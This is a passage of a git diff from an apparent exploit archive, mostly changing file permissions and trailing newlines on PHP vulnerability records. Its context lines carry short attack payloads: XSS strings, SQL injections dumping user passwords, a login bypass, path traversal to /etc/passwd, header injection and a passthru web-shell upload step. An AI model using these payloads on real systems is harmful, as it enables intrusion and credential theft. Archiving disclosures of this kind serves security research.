theft of sensitive information or other attacks. -http://www.example.org/index.php?PHPSESSID="><script>...</script> \ No newline at end of file +http://www.example.org/index.php?PHPSESSID="><script>...</script> \ No newline at end of file diff --git a/platforms/php/remote/24149.php b/platforms/php/remote/24149.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/24280.txt b/platforms/php/remote/24280.txt old mode 100755 new mode 100644 index ed47cf4b2..e4f36315e --- a/platforms/php/remote/24280.txt +++ b/platforms/php/remote/24280.txt @@ -12,4 +12,4 @@ If a web application uses strip_tags() similar to: $example = strip_tags($_REQUEST['user_input'], "<b><i><s>"); Then possible tags that may lead to exploitation might be: -<\0script> or <s\0cript> \ No newline at end of file +<\0script> or <s\0cript> \ No newline at end of file diff --git a/platforms/php/remote/24656.txt b/platforms/php/remote/24656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/24711.php b/platforms/php/remote/24711.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/24985.txt b/platforms/php/remote/24985.txt old mode 100755 new mode 100644 index b029d4916..bb3e82686 --- a/platforms/php/remote/24985.txt +++ b/platforms/php/remote/24985.txt @@ -6,4 +6,4 @@ It is reported that these vulnerabilities may only be exploited on Windows. http://www.example.com/phpscript.php?whatever=../../../../boot.ini%00 -http://www.example.com/phpscript.php?whatever=..\'file.ext \ No newline at end of file +http://www.example.com/phpscript.php?whatever=..\'file.ext \ No newline at end of file diff --git a/platforms/php/remote/25627.txt b/platforms/php/remote/25627.txt old mode 100755 new mode 100644 index 843ca0af9..df30a2639 --- a/platforms/php/remote/25627.txt +++ b/platforms/php/remote/25627.txt @@ -22,4 +22,4 @@ or passthru($_GET['nst']); ?> -Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt \ No newline at end of file +Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt \ No newline at end of file diff --git a/platforms/php/remote/25986.txt b/platforms/php/remote/25986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/26443.php b/platforms/php/remote/26443.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/27508.txt b/platforms/php/remote/27508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/27564.txt b/platforms/php/remote/27564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/27595.txt b/platforms/php/remote/27595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/27596.txt b/platforms/php/remote/27596.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/28713.php b/platforms/php/remote/28713.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/28760.php b/platforms/php/remote/28760.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29290.c b/platforms/php/remote/29290.c old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29732.php b/platforms/php/remote/29732.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29752.php b/platforms/php/remote/29752.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29784.php b/platforms/php/remote/29784.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29785.txt b/platforms/php/remote/29785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29788.php b/platforms/php/remote/29788.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29807.php b/platforms/php/remote/29807.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/29808.php b/platforms/php/remote/29808.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/30117.php b/platforms/php/remote/30117.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/30130.txt b/platforms/php/remote/30130.txt old mode 100755 new mode 100644 index 0b38832dc..59bb8dc97 --- a/platforms/php/remote/30130.txt +++ b/platforms/php/remote/30130.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to inject additional cookie attributes into s This issue affects PHP 5.2.3 (and prior versions) and PHP 4.4.7 (and prior versions). -http://www.example.com/session.php/PHPSESSID=ID;INJECTED=ATTRIBUTE;/ \ No newline at end of file +http://www.example.com/session.php/PHPSESSID=ID;INJECTED=ATTRIBUTE;/ \ No newline at end of file diff --git a/platforms/php/remote/30928.php b/platforms/php/remote/30928.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/31053.php b/platforms/php/remote/31053.php old mode 100755 new mode 100644 index aa5c9e4c6..39d0aeb8b --- a/platforms/php/remote/31053.php +++ b/platforms/php/remote/31053.php @@ -6,4 +6,4 @@ Attackers can use this issue to gain access to restricted files, potentially obt The issue affects PHP 5.2.5 and 5.2.4. -var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__))); \ No newline at end of file +var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__))); \ No newline at end of file diff --git a/platforms/php/remote/31479.txt b/platforms/php/remote/31479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/31639.txt b/platforms/php/remote/31639.txt old mode 100755 new mode 100644 index 27f7ffc1e..09bbd6fbb --- a/platforms/php/remote/31639.txt +++ b/platforms/php/remote/31639.txt @@ -6,4 +6,4 @@ To exploit this issue, an attacker must entice an unsuspecting user to load a ma Trillian 3.1.9.0 Basic is vulnerable; other versions may also be affected. -http://www.p1mp4m.es/index.php?act=attach&type=post&id=18 \ No newline at end of file +http://www.p1mp4m.es/index.php?act=attach&type=post&id=18 \ No newline at end of file diff --git a/platforms/php/remote/32359.txt b/platforms/php/remote/32359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/32416.php b/platforms/php/remote/32416.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/32417.php b/platforms/php/remote/32417.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/32618.txt b/platforms/php/remote/32618.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/33162.php b/platforms/php/remote/33162.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/33163.php b/platforms/php/remote/33163.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/33414.php b/platforms/php/remote/33414.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/33415.php b/platforms/php/remote/33415.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/33525.txt b/platforms/php/remote/33525.txt old mode 100755 new mode 100644 index d835a6819..8eca53830 --- a/platforms/php/remote/33525.txt +++ b/platforms/php/remote/33525.txt @@ -14,4 +14,4 @@ Versions prior to Zend Framework 1.7.9, 1.8.5, and 1.9.7 are vulnerable. The following example URI is available: -http://www.example.com/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln] \ No newline at end of file +http://www.example.com/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln] \ No newline at end of file diff --git a/platforms/php/remote/33920.php b/platforms/php/remote/33920.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/33988.txt b/platforms/php/remote/33988.txt old mode 100755 new mode 100644 index 9f776fc24..2d12d4eb8 --- a/platforms/php/remote/33988.txt +++ b/platforms/php/remote/33988.txt @@ -7,4 +7,4 @@ Attackers can exploit these issues to run arbitrary code within the context of t PHP 5.3 through 5.3.2 are vulnerable. -$ php -r "fopen('phar:///usr/bin/phar.phar/*%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x','r');" \ No newline at end of file +$ php -r "fopen('phar:///usr/bin/phar.phar/*%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x','r');" \ No newline at end of file diff --git a/platforms/php/remote/34132.txt b/platforms/php/remote/34132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/34160.txt b/platforms/php/remote/34160.txt old mode 100755 new mode 100644 index ba08178e8..504613dcc --- a/platforms/php/remote/34160.txt +++ b/platforms/php/remote/34160.txt @@ -292,4 +292,4 @@ print sys.exit() -##EDB-Note: Web server has to be able to interpret .php5 files \ No newline at end of file +##EDB-Note: Web server has to be able to interpret .php5 files \ No newline at end of file diff --git a/platforms/php/remote/34950.php b/platforms/php/remote/34950.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/34979.php b/platforms/php/remote/34979.php old mode 100755 new mode 100644 index 8f0a52a8d..060430a0f --- a/platforms/php/remote/34979.php +++ b/platforms/php/remote/34979.php @@ -10,4 +10,4 @@ $b = "bbbbbbbbbbb"; str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1); $var3 = mb_strcut($b, 0, 1000); echo $var3; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/remote/34985.txt b/platforms/php/remote/34985.txt old mode 100755 new mode 100644 index 9badc2344..5d08a40b7 --- a/platforms/php/remote/34985.txt +++ b/platforms/php/remote/34985.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br pfSense 1.2.3 is vulnerable; other versions may also be affected. http://www.example.com/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname= -http://www.example.com/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +http://www.example.com/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/remote/35855.txt b/platforms/php/remote/35855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/36124.txt b/platforms/php/remote/36124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/37688.txt b/platforms/php/remote/37688.txt old mode 100755 new mode 100644 index 0c77c15cd..bb2341a73 --- a/platforms/php/remote/37688.txt +++ b/platforms/php/remote/37688.txt @@ -11,4 +11,4 @@ header('Location: '.$_GET['url']); print_r($_COOKIE); ?> -http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo \ No newline at end of file +http://www.example.com/head1.php?url=http://example.com/head1.php%0DSet-Cookie:+NAME=foo \ No newline at end of file diff --git a/platforms/php/remote/38809.php b/platforms/php/remote/38809.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/38827.txt b/platforms/php/remote/38827.txt old mode 100755 new mode 100644 index 4d0ac91d5..a7a87dce2 --- a/platforms/php/remote/38827.txt +++ b/platforms/php/remote/38827.txt @@ -16,4 +16,4 @@ Content-Type: application/x-www-form-urlencoded Referer: http://localhost/nagiosql/ Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3 -tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login \ No newline at end of file +tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login \ No newline at end of file diff --git a/platforms/php/remote/39742.txt b/platforms/php/remote/39742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/40142.php b/platforms/php/remote/40142.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/40144.php b/platforms/php/remote/40144.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/42692.rb b/platforms/php/remote/42692.rb index 3eb2e9d8c..e876dc3d7 100755 --- a/platforms/php/remote/42692.rb +++ b/platforms/php/remote/42692.rb @@ -113,4 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/10002.txt b/platforms/php/webapps/10002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10003.txt b/platforms/php/webapps/10003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10006.txt b/platforms/php/webapps/10006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1003.c b/platforms/php/webapps/1003.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10042.txt b/platforms/php/webapps/10042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10043.txt b/platforms/php/webapps/10043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10045.txt b/platforms/php/webapps/10045.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10046.txt b/platforms/php/webapps/10046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10051.txt b/platforms/php/webapps/10051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10052.txt b/platforms/php/webapps/10052.txt old mode 100755 new mode 100644 index af03f8681..9b738e036 --- a/platforms/php/webapps/10052.txt +++ b/platforms/php/webapps/10052.txt @@ -15,4 +15,4 @@ http://www.example.com/inventory.php?t=N&viewID=3665819[SQL] ================================================ WebSite : -http://wwe.hostwq.net \ No newline at end of file +http://wwe.hostwq.net \ No newline at end of file diff --git a/platforms/php/webapps/10057.txt b/platforms/php/webapps/10057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10064.txt b/platforms/php/webapps/10064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10067.txt b/platforms/php/webapps/10067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10069.php b/platforms/php/webapps/10069.php old mode 100755 new mode 100644 index 1d8198c7f..1ac2e70b9 --- a/platforms/php/webapps/10069.php +++ b/platforms/php/webapps/10069.php @@ -52,7 +52,4 @@ $resp .= fread($ock, 1024); echo $resp; echo "[+]done!\r\n"; echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash" -?> - - - \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/webapps/10082.txt b/platforms/php/webapps/10082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10088.txt b/platforms/php/webapps/10088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10089.txt b/platforms/php/webapps/10089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10090.txt b/platforms/php/webapps/10090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10096.txt b/platforms/php/webapps/10096.txt old mode 100755 new mode 100644 index 5b212cbf9..ff54e15f6 --- a/platforms/php/webapps/10096.txt +++ b/platforms/php/webapps/10096.txt @@ -14,4 +14,4 @@ if(strstr($_SERVER['REQUEST_URI'], "/admin/mail.php/login.php" ) !== false){ } -Go fix your carts!!!! \ No newline at end of file +Go fix your carts!!!! \ No newline at end of file diff --git a/platforms/php/webapps/10101.txt b/platforms/php/webapps/10101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10105.txt b/platforms/php/webapps/10105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1014.txt b/platforms/php/webapps/1014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10165.txt b/platforms/php/webapps/10165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10168.txt b/platforms/php/webapps/10168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10169.txt b/platforms/php/webapps/10169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1017.php b/platforms/php/webapps/1017.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10177.txt b/platforms/php/webapps/10177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10178.txt b/platforms/php/webapps/10178.txt old mode 100755 new mode 100644 index ac5a96d31..c9a9134b4 --- a/platforms/php/webapps/10178.txt +++ b/platforms/php/webapps/10178.txt @@ -100,4 +100,4 @@ Joke.. ;) [+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh [+] makasih buat om tukulesto buat perl exploit nye .. huahhh [+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha -[+] om tukulesto kutunggu kau di kotaku .. :D -----------------------------------------------------------------] \ No newline at end of file +[+] om tukulesto kutunggu kau di kotaku .. :D -----------------------------------------------------------------] \ No newline at end of file diff --git a/platforms/php/webapps/1018.php b/platforms/php/webapps/1018.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10180.txt b/platforms/php/webapps/10180.txt old mode 100755 new mode 100644 index 8857a52b9..94163ba32 --- a/platforms/php/webapps/10180.txt +++ b/platforms/php/webapps/10180.txt @@ -94,4 +94,4 @@ Delete Comment: http://server/simplog/comments.php?op=del&cid= 03/11/2009 Bug Discovered 03/11/2009 Reported to Vendor 16/11/2009 No response received till the date -16/11/2009 Public Disclosure \ No newline at end of file +16/11/2009 Public Disclosure \ No newline at end of file diff --git a/platforms/php/webapps/10181.txt b/platforms/php/webapps/10181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10183.php b/platforms/php/webapps/10183.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10189.txt b/platforms/php/webapps/10189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10192.txt b/platforms/php/webapps/10192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1020.c b/platforms/php/webapps/1020.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10214.txt b/platforms/php/webapps/10214.txt old mode 100755 new mode 100644 index 98a09b1ba..a0ccf130a --- a/platforms/php/webapps/10214.txt +++ b/platforms/php/webapps/10214.txt @@ -11,4 +11,4 @@ http:///server/index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all ## WWW.1923TURK.BÝZ -## GREETZ : DELÝBEY TÝAMO \ No newline at end of file +## GREETZ : DELÝBEY TÝAMO \ No newline at end of file diff --git a/platforms/php/webapps/10216.txt b/platforms/php/webapps/10216.txt old mode 100755 new mode 100644 index b8deaf303..727ed2618 --- a/platforms/php/webapps/10216.txt +++ b/platforms/php/webapps/10216.txt @@ -24,4 +24,4 @@ # all member at manadocoding.net # \##############################################/ - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10217.txt b/platforms/php/webapps/10217.txt old mode 100755 new mode 100644 index 3900e7d43..e457efbab --- a/platforms/php/webapps/10217.txt +++ b/platforms/php/webapps/10217.txt @@ -39,4 +39,4 @@ # all member at sekuritionline.net # \##############################################/ - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10218.txt b/platforms/php/webapps/10218.txt old mode 100755 new mode 100644 index 727a4a851..fae5b0b3e --- a/platforms/php/webapps/10218.txt +++ b/platforms/php/webapps/10218.txt @@ -26,4 +26,4 @@ # Contact Me : cr4wl3r[4t]linuxmail[dot]org - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10219.txt b/platforms/php/webapps/10219.txt old mode 100755 new mode 100644 index 6e55dd3f6..707704e16 --- a/platforms/php/webapps/10219.txt +++ b/platforms/php/webapps/10219.txt @@ -24,4 +24,4 @@ # all member at manadocoding.net # \##############################################/ - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10220.txt b/platforms/php/webapps/10220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10222.txt b/platforms/php/webapps/10222.txt old mode 100755 new mode 100644 index 0d255b45b..2c9202dab --- a/platforms/php/webapps/10222.txt +++ b/platforms/php/webapps/10222.txt @@ -33,4 +33,4 @@ [!] [!]====================================================================|| [!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends . || -[*]====================================================================|| \ No newline at end of file +[*]====================================================================|| \ No newline at end of file diff --git a/platforms/php/webapps/10224.txt b/platforms/php/webapps/10224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10227.txt b/platforms/php/webapps/10227.txt old mode 100755 new mode 100644 index 0828a3ebf..cb41d7f4c --- a/platforms/php/webapps/10227.txt +++ b/platforms/php/webapps/10227.txt @@ -25,4 +25,4 @@ http://server/index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1%20 http://server/index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1+union+all+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+from+jos_users -http://server/index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users \ No newline at end of file +http://server/index.php?option=com_mygallery&amp;func=viewcategory&amp;cid=-1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users \ No newline at end of file diff --git a/platforms/php/webapps/10228.txt b/platforms/php/webapps/10228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10230.txt b/platforms/php/webapps/10230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10231.txt b/platforms/php/webapps/10231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10232.txt b/platforms/php/webapps/10232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10233.txt b/platforms/php/webapps/10233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10234.txt b/platforms/php/webapps/10234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10236.txt b/platforms/php/webapps/10236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10238.txt b/platforms/php/webapps/10238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10241.txt b/platforms/php/webapps/10241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10245.txt b/platforms/php/webapps/10245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10246.txt b/platforms/php/webapps/10246.txt old mode 100755 new mode 100644 index c09a81b8e..97d431ffa --- a/platforms/php/webapps/10246.txt +++ b/platforms/php/webapps/10246.txt @@ -23,4 +23,4 @@ - [ Gorontalo / 2009 \ No newline at end of file + [ Gorontalo / 2009 \ No newline at end of file diff --git a/platforms/php/webapps/10248.txt b/platforms/php/webapps/10248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10249.txt b/platforms/php/webapps/10249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10250.txt b/platforms/php/webapps/10250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10252.txt b/platforms/php/webapps/10252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10256.txt b/platforms/php/webapps/10256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10259.txt b/platforms/php/webapps/10259.txt old mode 100755 new mode 100644 index 0dff8072e..6747f1522 --- a/platforms/php/webapps/10259.txt +++ b/platforms/php/webapps/10259.txt @@ -20,4 +20,4 @@ - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10260.txt b/platforms/php/webapps/10260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10272.txt b/platforms/php/webapps/10272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10273.txt b/platforms/php/webapps/10273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10274.txt b/platforms/php/webapps/10274.txt old mode 100755 new mode 100644 index d963b38d2..f18ce1d6b --- a/platforms/php/webapps/10274.txt +++ b/platforms/php/webapps/10274.txt @@ -42,4 +42,4 @@ http://server/index.php?action=admin;area=languages;sa=add;[token] PoC: "><xss> http://server/index.php?action=admin;area=theme;sa=settings;th=2;[token] -PoC: http://urlreal"><script>alert(1);</script> \ No newline at end of file +PoC: http://urlreal"><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/10275.txt b/platforms/php/webapps/10275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10277.txt b/platforms/php/webapps/10277.txt old mode 100755 new mode 100644 index 3fcbd4692..47075e950 --- a/platforms/php/webapps/10277.txt +++ b/platforms/php/webapps/10277.txt @@ -37,4 +37,4 @@ ######################################################################## - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10284.txt b/platforms/php/webapps/10284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10285.txt b/platforms/php/webapps/10285.txt old mode 100755 new mode 100644 index a5f83b780..66a2c4916 --- a/platforms/php/webapps/10285.txt +++ b/platforms/php/webapps/10285.txt @@ -19,4 +19,4 @@ ######################################################################## ######################################################################## - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10286.txt b/platforms/php/webapps/10286.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10287.txt b/platforms/php/webapps/10287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10288.txt b/platforms/php/webapps/10288.txt old mode 100755 new mode 100644 index db70cf4a1..c0d9159f5 --- a/platforms/php/webapps/10288.txt +++ b/platforms/php/webapps/10288.txt @@ -24,4 +24,4 @@ ######################################################################## ######################################################################## - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10289.txt b/platforms/php/webapps/10289.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10290.txt b/platforms/php/webapps/10290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10291.txt b/platforms/php/webapps/10291.txt old mode 100755 new mode 100644 index 07ad1c3b5..91621c4d0 --- a/platforms/php/webapps/10291.txt +++ b/platforms/php/webapps/10291.txt @@ -9,4 +9,4 @@ An attacker can exploit this issue by enticing an unsuspecting user to follow a The following proof-of-concept URIs are available: http://server/1";alert(document.cookie);// -http://server/page?";alert(document.cookie);// \ No newline at end of file +http://server/page?";alert(document.cookie);// \ No newline at end of file diff --git a/platforms/php/webapps/10293.txt b/platforms/php/webapps/10293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10294.txt b/platforms/php/webapps/10294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10297.php b/platforms/php/webapps/10297.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10299.txt b/platforms/php/webapps/10299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10302.txt b/platforms/php/webapps/10302.txt old mode 100755 new mode 100644 index 74a3dd132..0e49d8775 --- a/platforms/php/webapps/10302.txt +++ b/platforms/php/webapps/10302.txt @@ -19,4 +19,4 @@ # http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1-- ######################################################################## - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10304.txt b/platforms/php/webapps/10304.txt old mode 100755 new mode 100644 index accf2f560..1e0996d81 --- a/platforms/php/webapps/10304.txt +++ b/platforms/php/webapps/10304.txt @@ -671,4 +671,4 @@ The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/php/webapps/10305.txt b/platforms/php/webapps/10305.txt old mode 100755 new mode 100644 index c2dc4bff4..6623c8f0f --- a/platforms/php/webapps/10305.txt +++ b/platforms/php/webapps/10305.txt @@ -11,4 +11,4 @@ The following example URIs are available: http://server/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI] http://server/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI] -http://server/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://server/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/10306.txt b/platforms/php/webapps/10306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10307.txt b/platforms/php/webapps/10307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10312.php b/platforms/php/webapps/10312.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10314.txt b/platforms/php/webapps/10314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10318.txt b/platforms/php/webapps/10318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10324.txt b/platforms/php/webapps/10324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10325.txt b/platforms/php/webapps/10325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10329.txt b/platforms/php/webapps/10329.txt old mode 100755 new mode 100644 index 9a715d380..dcd87a80c --- a/platforms/php/webapps/10329.txt +++ b/platforms/php/webapps/10329.txt @@ -17,4 +17,4 @@ PoC : http://server/[path]/components/core/connect.php?language_path=[Shell] ######################################################################## - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/php/webapps/10330.txt b/platforms/php/webapps/10330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10337.txt b/platforms/php/webapps/10337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10341.txt b/platforms/php/webapps/10341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10350.txt b/platforms/php/webapps/10350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10351.txt b/platforms/php/webapps/10351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10354.txt b/platforms/php/webapps/10354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10356.txt b/platforms/php/webapps/10356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10357.txt b/platforms/php/webapps/10357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10358.txt b/platforms/php/webapps/10358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1036.php b/platforms/php/webapps/1036.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10361.txt b/platforms/php/webapps/10361.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10364.txt b/platforms/php/webapps/10364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10366.txt b/platforms/php/webapps/10366.txt 